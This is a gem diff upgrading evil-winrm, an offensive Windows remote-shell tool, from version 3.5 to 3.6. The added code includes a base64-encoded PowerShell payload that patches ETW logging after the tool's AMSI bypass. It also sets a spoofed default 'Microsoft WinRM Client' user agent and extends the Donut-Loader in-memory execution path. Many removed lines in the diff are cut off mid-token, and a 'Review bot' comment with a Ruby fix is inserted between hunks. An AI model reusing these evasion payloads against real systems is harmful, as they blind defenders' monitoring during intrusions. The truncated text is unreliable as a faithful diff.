evil-winrm 3.5 → 3.6
- checksums.yaml +4 -4
- data/evil-winrm.rb +33 -15
- metadata +7 -7
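--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz:
-data.tar.gz:
+metadata.gz: 11cbf4c87fb485b3e75bba373489df758d42cb83e2f4241ac2050d49d47855cd
+data.tar.gz: dc27a65532ba270c3fe759f24596182f69964b38f3121f02b5012ffe1603b6ee
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: 3da2f100a245cbcfe9a14a50b72ccb900722204517d6db37abbb98cc90b48566abf4a7f4eff42d5a58f950e3ee9dc798fdeedb1af80678fe0310b62d7daa604f
+data.tar.gz: 94ff2e006ad6328cfc12975b7d79000dfb376c1bed5c0db90e85d45bb041941f8290ce7611ab817bcbc37b6fefcdc3e4432295f79f73ef62a03cac794b2efb56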
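--- a/data/evil-winrm.rb
+++ b/data/evil-winrm.rb
@@ -17,11 +17,12 @@ require 'io/console'
 require 'time'
 require 'fileutils'
 require 'logger'
+require 'shellwords'
 
 # Constants
 
 # Version
-VERSION = '3.
+VERSION = '3.6'
 
 # Msg types
 TYPE_INFO = 0
@@ -56,6 +57,7 @@ $password = ''
 $url = 'wsman'
 $default_service = 'HTTP'
 $full_logging_path = "#{Dir.home}/evil-winrm-logs"
+$user_agent = "Microsoft WinRM Client"
 
 # Redefine download method from winrm-fs
 module WinRM
@@ -64,7 +66,7 @@ module WinRM
 def download(remote_path, local_path, chunk_size = 1024 * 1024, first = true, size: -1)
 @logger.debug("downloading: #{remote_path} -> #{local_path} #{chunk_size}")
 index = 0
-return download_dir(remote_path, local_path, chunk_size, false) if remote_path.match?(/(
+return download_dir(remote_path, local_path, chunk_size, false) if remote_path.match?(/(\*\.?|\*\*|\.?\*|\*)/)
 output = _output_from_file(remote_path, chunk_size, index)
 return download_dir(remote_path, local_path, chunk_size, true) if output.exitcode == 2
 return false if output.exitcode >= 1
@@ -89,7 +91,7 @@ module WinRM
 end
 
 def download_dir(remote_path, local_path, chunk_size, first)
-index_exp = remote_path.index(/(
+index_exp = remote_path.index(/(\*\.?|\*\*|\.?\*|\*)/) || 0
 remote_file_path = remote_path
 
 if index_exp > 0
@@ -155,13 +157,16 @@ class EvilWinRM
 
 # Arguments
 def arguments
-options = { port: $port, url: $url, service: $service }
+options = { port: $port, url: $url, service: $service, user_agent: $user_agent }
 optparse = OptionParser.new do |opts|
-opts.banner = 'Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]'
+opts.banner = 'Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-a USERAGENT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]'
 opts.on('-S', '--ssl', 'Enable ssl') do |_val|
 $ssl = true
 options[:port] = '5986'
 end
+opts.on('-a', '--user-agent USERAGENT', 'Specify connection user-agent (default Microsoft WinRM Client)') do |val|
+options[:user_agent] = val
+end
 opts.on('-c', '--pub-key PUBLIC_KEY_PATH', 'Local path to public key certificate') do |val|
 options[:pub_key] = val
 end
@@ -253,6 +258,7 @@ class EvilWinRM
 $priv_key = options[:priv_key]
 $realm = options[:realm]
 $service = options[:service]
+$user_agent = options[:user_agent]
 unless $log.nil?
 
 FileUtils.mkdir_p $full_logging_path
@@ -289,7 +295,8 @@ class EvilWinRM
 no_ssl_peer_verification: true,
 transport: :ssl,
 client_cert: $pub_key,
-client_key: $priv_key
+client_key: $priv_key,
+user_agent: $user_agent
 )
 else
 WinRM::Connection.new(
@@ -297,7 +304,8 @@ class EvilWinRM
 user: $user,
 password: $password,
 no_ssl_peer_verification: true,
-transport: :ssl
+transport: :ssl,
+user_agent: $user_agent
 )
 end
 
@@ -308,14 +316,16 @@ class EvilWinRM
 password: '',
 transport: :kerberos,
 realm: $realm,
-service: $service
+service: $service,
+user_agent: $user_agent
 )
 else
 $conn = WinRM::Connection.new(
 endpoint: "http://#{$host}:#{$port}/#{$url}",
 user: $user,
 password: $password,
-no_ssl_peer_verification: true
+no_ssl_peer_verification: true,
+user_agent: $user_agent
 )
 end
 end
@@ -379,10 +389,10 @@ class EvilWinRM
 priv_key = priv_key.to_s
 if $ssl
 unless pub_key.empty? && priv_key.empty? then
-unless [pub_key, priv_key].all? {|f| File.
-print_message("Path to provided public certificate file \"#{pub_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.
+unless [pub_key, priv_key].all? {|f| File.exist?(f) } then
+print_message("Path to provided public certificate file \"#{pub_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exist?(pub_key)
 
-print_message("Path to provided private certificate file \"#{priv_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.
+print_message("Path to provided private certificate file \"#{priv_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exist?(priv_key)
 
 custom_exit(1)
 end
@@ -678,6 +688,7 @@ class EvilWinRM
 dest = ""
 source = ""
 paths = get_paths_from_command(command, pwd)
+
 if paths.length == 2
 dest = paths.pop
 source = paths.pop
@@ -759,6 +770,8 @@ class EvilWinRM
 load_executable = File.binread(load_executable)
 load_executable = Base64.strict_encode64(load_executable)
 output = shell.run("Donut-Loader -process_id #{pid} -donutfile #{load_executable}")
+else
+output = shell.run("Donut-Loader")
 end
 print(output.output)
 $logger&.info(output.output)
@@ -908,7 +921,7 @@ class EvilWinRM
 end
 
 def get_Bypass_4MSI
-bypass_template = '
+bypass_template = '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'
 dec_template = Base64.decode64(bypass_template)
 result = dec_template.gsub('$var1', generate_random_type_string)
 @bypass_amsi_words_random_case.each { |w| result.gsub!(w.to_s, random_case(w)) }
@@ -927,6 +940,12 @@ class EvilWinRM
 output = shell.run(bypass)
 if output.output.empty?
 print_message('[+] Success!', TYPE_SUCCESS, false)
+print_message('Patching ETW, please be patient ..', TYPE_INFO, true)
+patch_etw = Base64.decode64("W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkV2l0aFBhcnRpYWxOYW1lKCdTeXN0ZW0uQ29yZScpLkdldFR5cGUoJ1N5c3RlbS5EaWFnbm9zdGljcy5FdmVudGluZy5FdmVudFByb3ZpZGVyJykuR2V0RmllbGQoJ21fZW5hYmxlZCcsJ05vblB1YmxpYyxJbnN0YW5jZScpLlNldFZhbHVlKFtSZWZdLkFzc2VtYmx5LkdldFR5cGUoJ1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uVHJhY2luZy5QU0V0d0xvZ1Byb3ZpZGVyJykuR2V0RmllbGQoJ2V0d1Byb3ZpZGVyJywnTm9uUHVibGljLFN0YXRpYycpLkdldFZhbHVlKCksMCkK")
+output = shell.run(patch_etw)
+print_message('[+] Success!', TYPE_SUCCESS, false)
+output = shell.run("Remove-Item Function:getDelegateType")
+output = shell.run ("Remove-Item Function:LookupFunc")
 else
 puts(output.output)
 end
@@ -939,9 +958,8 @@ class EvilWinRM
 end
 
 def get_paths_from_command(command, pwd)
-parts = command
+parts = Shellwords.shellsplit(command)
 parts.delete_at(0)
-parts.each { |p| p.gsub!('"', '') }
 return parts
 end
 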
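Review bot: `Shellwords.shellsplit(command)` in get_paths_from_command applies POSIX escaping, so an unquoted backslash is consumed as an escape and a Windows path typed as `C:\Temp\a.txt` comes back as `C:Tempa.txt`, and an unmatched quote raises `ArgumentError`, which nothing in this hunk rescues, so the interactive command would abort instead of reporting the bad input. Doubling backslashes before the split keeps them literal in bare and double-quoted arguments (single-quoted arguments would then carry doubled backslashes, which is the trade-off to confirm), and rescuing the parse error lets the method report the problem through `print_message` like the rest of the file. The empty-array fallback assumes the caller's branch for a result that is not two elements long already handles missing arguments; that branch is outside the hunk. The `pwd` parameter is still unused in the new body and could be renamed `_pwd`.
```ruby
def get_paths_from_command(command, pwd)
  # Shellwords follows POSIX rules: a bare backslash escapes the next character,
  # so double them first to keep Windows-style paths intact.
  parts = Shellwords.shellsplit(command.gsub('\\') { '\\\\' })
  parts.delete_at(0)
  return parts
rescue ArgumentError => e
  # raised on an unmatched quote in the typed command
  print_message("Could not parse command arguments: #{e.message}", TYPE_ERROR, true, $logger)
  []
end
```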
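--- a/metadata
+++ b/metadata
@@ -1,17 +1,17 @@
 --- !ruby/object:Gem::Specification
 name: evil-winrm
 version: !ruby/object:Gem::Version
-version: '3.
+version: '3.6'
 platform: ruby
 authors:
 - CyberVaca
 - OscarAkaElvis
 - Jarilaos
 - Arale61
-autorequire:
+autorequire:
 bindir: bin
 cert_chain: []
-date:
+date: 2024-10-06 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
 name: fileutils
@@ -70,7 +70,7 @@ dependencies:
 version: '2.3'
 - - ">="
 - !ruby/object:Gem::Version
-version: 2.3.
+version: 2.3.7
 type: :runtime
 prerelease: false
 version_requirements: !ruby/object:Gem::Requirement
@@ -80,7 +80,7 @@ dependencies:
 version: '2.3'
 - - ">="
 - !ruby/object:Gem::Version
-version: 2.3.
+version: 2.3.7
 - !ruby/object:Gem::Dependency
 name: winrm-fs
 requirement: !ruby/object:Gem::Requirement
@@ -151,8 +151,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
 - !ruby/object:Gem::Version
 version: '0'
 requirements: []
-rubygems_version: 3.
-signing_key:
+rubygems_version: 3.3.15
+signing_key:
 specification_version: 4
 summary: Evil-WinRM
 test_files: []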